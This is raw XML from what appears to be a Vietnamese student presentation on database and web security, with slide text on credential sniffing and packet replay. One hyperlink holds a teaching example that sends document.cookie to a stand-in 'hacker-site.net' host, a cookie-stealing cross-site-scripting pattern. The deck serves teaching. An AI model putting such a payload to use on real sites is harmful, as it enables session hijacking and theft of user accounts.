    <dgm:cxn modelId="{040EE75D-5AB8-4FAB-8515-7E886C289C8D}" type="presParOf" srcId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" destId="{21C785DF-2620-4FCB-A6D1-3BA8D0B95F4A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{EBC03394-2575-4970-BC42-D6C4D71C46B8}" type="presParOf" srcId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" destId="{7B63D1D8-B6B1-44D2-BC18-3C6CA446E959}"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931087-83CF-46DA-A21A-128B08DFA2B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B270B23-FAD8-4555-842A-838712212FD4}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Đôi khi kẻ tấn công sẽ cố gắng lắng nghe lưu lượng mạng giữa máy chủ và máy khách cố gắng đăng nhập vào hệ thống bằng cách sử dụng thông tin đăng nhập hệ thống (tên người dùng và mật khẩu). </a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:latin typeface="+mj-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDB4A6FB-6DD6-4BBE-BEBB-88F5B6872C8B}" type="parTrans" cxnId="{6572FE71-FDF2-4B7C-9D32-BE53B0405EE2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCBF6767-762B-49B3-9942-CFD72597D1C9}" type="sibTrans" cxnId="{6572FE71-FDF2-4B7C-9D32-BE53B0405EE2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02630765-2406-4DCD-9FC3-FFE967965F07}">
      <dgm:prSet>
        <dgm:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="vi-VN">
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>Nếu </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN" b="1">
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>thông tin</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN">
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t> đăng nhập </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN" b="1">
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>không được mã hóa</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN">
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>, kẻ tấn công sẽ cố gắng đăng nhập vào ứng dụng web bằng cách sử dụng thông tin đăng nhập bị đánh cắp. Nhưng nếu thông tin đăng nhập được mã hóa, kẻ tấn công sẽ cố gắng đăng nhập bằng cách </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN" u="sng">
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>lặp lại các gói tin mạng bị đánh cắp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" u="sng">
              <a:latin typeface="+mj-lt"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:latin typeface="+mj-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1763B3F0-B2E5-4CF3-AF76-22B3B84B7F02}" type="parTrans" cxnId="{99172B82-6732-4F3E-A47D-4A53AB4FA8D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D1F2BCE-70F2-48D9-B52B-0A72243821DB}" type="sibTrans" cxnId="{99172B82-6732-4F3E-A47D-4A53AB4FA8D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B93BC444-B85B-4CD5-AC6F-1AF602DB964D}" type="pres">
      <dgm:prSet presAssocID="{4F931087-83CF-46DA-A21A-128B08DFA2B7}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BEDF8D9-8126-45A5-B4EB-6BDA728931CE}" type="pres">
      <dgm:prSet presAssocID="{3B270B23-FAD8-4555-842A-838712212FD4}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5A2547F-EC93-4C88-8813-5BBD0D3CA3C1}" type="pres">
      <dgm:prSet presAssocID="{CCBF6767-762B-49B3-9942-CFD72597D1C9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8E149694-BBDF-46D0-ADA6-27CE85BB5260}" type="pres">
      <dgm:prSet presAssocID="{02630765-2406-4DCD-9FC3-FFE967965F07}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{6572FE71-FDF2-4B7C-9D32-BE53B0405EE2}" srcId="{4F931087-83CF-46DA-A21A-128B08DFA2B7}" destId="{3B270B23-FAD8-4555-842A-838712212FD4}" srcOrd="0" destOrd="0" parTransId="{EDB4A6FB-6DD6-4BBE-BEBB-88F5B6872C8B}" sibTransId="{CCBF6767-762B-49B3-9942-CFD72597D1C9}"/>
    <dgm:cxn modelId="{99172B82-6732-4F3E-A47D-4A53AB4FA8D8}" srcId="{4F931087-83CF-46DA-A21A-128B08DFA2B7}" destId="{02630765-2406-4DCD-9FC3-FFE967965F07}" srcOrd="1" destOrd="0" parTransId="{1763B3F0-B2E5-4CF3-AF76-22B3B84B7F02}" sibTransId="{9D1F2BCE-70F2-48D9-B52B-0A72243821DB}"/>
    <dgm:cxn modelId="{484FCCBF-4B47-4B44-B70A-CC891BE31990}" type="presOf" srcId="{3B270B23-FAD8-4555-842A-838712212FD4}" destId="{2BEDF8D9-8126-45A5-B4EB-6BDA728931CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8D4A7973-4458-4270-967B-4129445EDA95}" type="presOf" srcId="{02630765-2406-4DCD-9FC3-FFE967965F07}" destId="{8E149694-BBDF-46D0-ADA6-27CE85BB5260}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{35E4B0DD-8E1B-4F27-BC9A-B32C531B129E}" type="presOf" srcId="{4F931087-83CF-46DA-A21A-128B08DFA2B7}" destId="{B93BC444-B85B-4CD5-AC6F-1AF602DB964D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{228FF867-6A3A-49F7-B43B-EBE9E760110F}" type="presParOf" srcId="{B93BC444-B85B-4CD5-AC6F-1AF602DB964D}" destId="{2BEDF8D9-8126-45A5-B4EB-6BDA728931CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7768D0DC-A661-415C-8D14-9E29AE4E97F1}" type="presParOf" srcId="{B93BC444-B85B-4CD5-AC6F-1AF602DB964D}" destId="{F5A2547F-EC93-4C88-8813-5BBD0D3CA3C1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B66B03C2-64A5-46D5-B3C6-1D3BBE3206CC}" type="presParOf" srcId="{B93BC444-B85B-4CD5-AC6F-1AF602DB964D}" destId="{8E149694-BBDF-46D0-ADA6-27CE85BB5260}"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E48B1-166F-4F13-9FAE-7251EA0E9074}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4527"/>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16BA58-2065-4246-9186-56DA38A33F34}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4527"/>
          <a:ext cx="10935383" cy="130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a:t>Nguyễn Thành Phát – 21010471 (CĐ 6)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4527"/>
        <a:ext cx="10935383" cy="1300220"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E57FF448-CC67-47A6-9ABA-0322CF3B19A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1304748"/>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DA621-8A9E-4019-AB44-B4067E063C69}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1304748"/>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dirty="0" err="1"/>
            <a:t>Châu</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5200" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5200" kern="1200" dirty="0" err="1"/>
            <a:t>Công</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5200" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5200" kern="1200" dirty="0" err="1"/>
            <a:t>Thoại</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5200" kern="1200" dirty="0"/>
            <a:t> – 21009641 (CĐ 6)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1304748"/>
        <a:ext cx="10935383" cy="1319565"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1F02AB9-6CB7-4BC6-94D4-0D94D0B1C4AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2624313"/>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81591-6893-4F34-BF1F-E375A2AE8B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2624313"/>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a:t>Nguyễn Đức Mạnh – 21087261 (CĐ 29) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2624313"/>
        <a:ext cx="10935383" cy="1319565"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{57783180-DF65-447D-A23B-4BB36CBFE36E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3943878"/>
          <a:ext cx="1093538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0B5F0C-AB96-4649-9660-6985F76B727C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3943878"/>
          <a:ext cx="10935383" cy="131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a:t>Trần Tuấn Khang – 21125481 (CĐ 29) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3943878"/>
        <a:ext cx="10935383" cy="1319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13567-E371-44D6-BF64-DB1B90FF0D27}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="7745917" cy="36688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8704" tIns="149352" rIns="74676" bIns="149352" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="2489200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="5600" b="1" u="none" kern="1200" spc="-84">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>I. Giới thiệu về cách tiếp cận bảo mật cơ sở dữ liệu</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="5600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="6828700" cy="3668869"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7B63D1D8-B6B1-44D2-BC18-3C6CA446E959}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5785387" y="0"/>
          <a:ext cx="9804710" cy="3668869"/>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028" tIns="149352" rIns="74676" bIns="149352" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="2489200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="5600" b="1" u="none" kern="1200" spc="-84">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="5600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7619822" y="0"/>
        <a:ext cx="6135841" cy="3668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F9E1F64-F0CF-88AA-933F-C315537BE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E765CB90-6330-1B42-CC2F-65872D50B2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BAE320-2480-44B4-B34F-604976F93F49}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/10/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{EB0AB9CC-0477-DA20-BE98-8CA6A8E957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7E54319-458A-7DE7-F7A6-3E315A5CEB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E684DA-A4AA-4A20-A7FC-D453375578C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12222371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AE296-2513-44C1-84A4-DD1E052C1F3E}"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C798A-26E0-4075-9EB5-D8B40BD5C10E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25140376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FC798A-26E0-4075-9EB5-D8B40BD5C10E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224128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A91557-D5A3-4BA6-9E29-39912DFA2999}" type="datetime1">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36283E-9ECA-4FB2-8210-CEEA1BAA11FC}" type="datetime1">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DEDE7-AD60-4CE0-BCA3-E647F9CD1F43}" type="datetime1">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F032AB-9B4C-4036-B1E6-9272B2E03821}" type="datetime1">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36175-43E9-4B84-84F1-7B4CA899FDF7}" type="datetime1">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F016CB-0BBE-4845-9B9B-85B2557B6333}" type="datetime1">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8A5C46-5B00-49FE-8C47-45771C594C4C}" type="datetime1">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77504D-AFB7-409A-B776-6E47151CBC95}" type="datetime1">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39702-FCCD-4738-8B1E-51B309D99790}" type="datetime1">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507F44-0565-43B6-AB1B-83DFB67E1D9F}" type="datetime1">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DDE8E5-8C45-478E-BE6C-FFF4F2765DC4}" type="datetime1">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BFA54-0846-469E-B9DC-07C86D319180}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/10/2024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hyperlink" Target="http://hacker-site.net/%E2%80%9D+document.cookie;"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hacker-site.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/"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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout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21.jpeg"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors3.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sv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svg"/><Relationship Id="rId7"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svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyl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75382"/>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637477" y="5974185"/>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xmlns=""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en-US"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Bài báo 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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(Chủ đề 6)</a:t>
            </a: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6 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946948" y="8661995"/>
            <a:ext cx="8999366" cy="434221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3640"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>GIẢNG VIÊN: VÕ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>NGỌC TẤN PHƯỚC</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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A37E34E3-CCF7-41CA-563C-167F1D6AA16B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567760" y="9814639"/>
            <a:ext cx="500040" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:body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a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/23</a:t>
            </a:r>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xmlns=""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xmlns="" id="{57633644-05AE-F758-5715-8FCC2B0243B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2524187"/>
            <a:ext cx="16802100" cy="7442430"/>
            <a:chOff x="40798" y="25661"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{70556116-A017-23AC-3C61-83D667F0A3F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="2566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xmlns="" id="{ED1BA458-8772-2DBE-E547-07AED6D4D06E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="71151"/>
              <a:ext cx="1950879" cy="263551"/>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latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="32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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AAC0BB1E-3517-3A12-40A8-E5521D4A8767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11030026" y="3039184"/>
            <a:ext cx="5878168" cy="5579280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F7CE1E80-53DB-2DC7-4FA4-36EB9B723619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11331606" y="8508786"/>
            <a:ext cx="5576587"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 [11]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7D23794C-577C-A672-C992-32CB18122B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7918602" y="9639300"/>
            <a:ext cx="691997" cy="3337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10</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9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{68460DD8-94BC-320E-4CA8-FD1F9839F9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065236" y="3561721"/>
            <a:ext cx="10020299" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- (Bước 1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
